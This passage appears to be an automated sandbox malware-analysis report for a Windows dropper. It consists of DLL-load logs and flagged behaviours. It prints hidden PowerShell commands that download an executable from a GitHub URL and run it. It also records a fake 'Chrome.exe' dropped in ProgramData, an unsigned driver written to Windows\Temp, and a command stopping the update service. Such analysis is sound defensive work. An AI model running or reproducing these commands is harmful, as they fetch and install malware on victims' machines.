Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: amsi.dll
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"	Jump to behavior

Source: 1348.exe.3.dr	Static PE information: section name: .00cfg
Source: Chrome.exe.6.dr	Static PE information: section name: .00cfg

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF8880100BD pushad ; iretd		3_2_00007FF8880100C1
Source: C:\Windows\System32\conhost.exe	Code function: 47_2_0000000140001394 push qword ptr [0000000140009004h]; ret		47_2_0000000140001403

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\ProgramData\Chrome.exe

File created: C:\Windows\TEMP\lhaqmlexwhjs.sys

Jump to behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1348.exe	File created: C:\ProgramData\Chrome.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\1348.exe	Jump to dropped file
Source: C:\ProgramData\Chrome.exe	File created: C:\Windows\Temp\lhaqmlexwhjs.sys	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1348.exe

File created: C:\ProgramData\Chrome.exe

Jump to dropped file

Source: C:\ProgramData\Chrome.exe

File created: C:\Windows\Temp\lhaqmlexwhjs.sys

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1348.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
